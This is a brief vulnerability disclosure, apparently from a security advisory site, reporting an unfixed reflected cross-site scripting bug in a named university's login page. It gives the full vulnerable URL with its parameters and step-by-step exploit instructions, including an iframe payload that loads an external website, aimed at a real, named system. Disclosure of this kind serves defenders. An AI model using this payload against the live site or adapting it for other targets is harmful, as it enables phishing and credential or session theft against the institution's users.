Asia Pacific Institute of Information Technology (APIIT) Ref. XSS

2018.04.13
my da74 (MY) my
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

Reflected Cross Site Scripting (Unfixed) bug found in login page of sia Pacific Institute of Information Technology (APIIT) Exploit Details: 1) Goto: http://titan.apiit.edu.my/db_authentication/login.asp?REDIRECTPAGE=http://lms.apiit.edu.my/login/login.php&APPID=MOODLE&SID=t8n96koto95hsffthdb71cvdd0&ER=URI&CID= 2) At the end of URL, paste: <xml id="X"><iframe src="http://cyberjokers.pe.hu/"></iframe></xml> 3) See the iframe load an external website Found By: da74


Vote for this issue:
90%
10%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top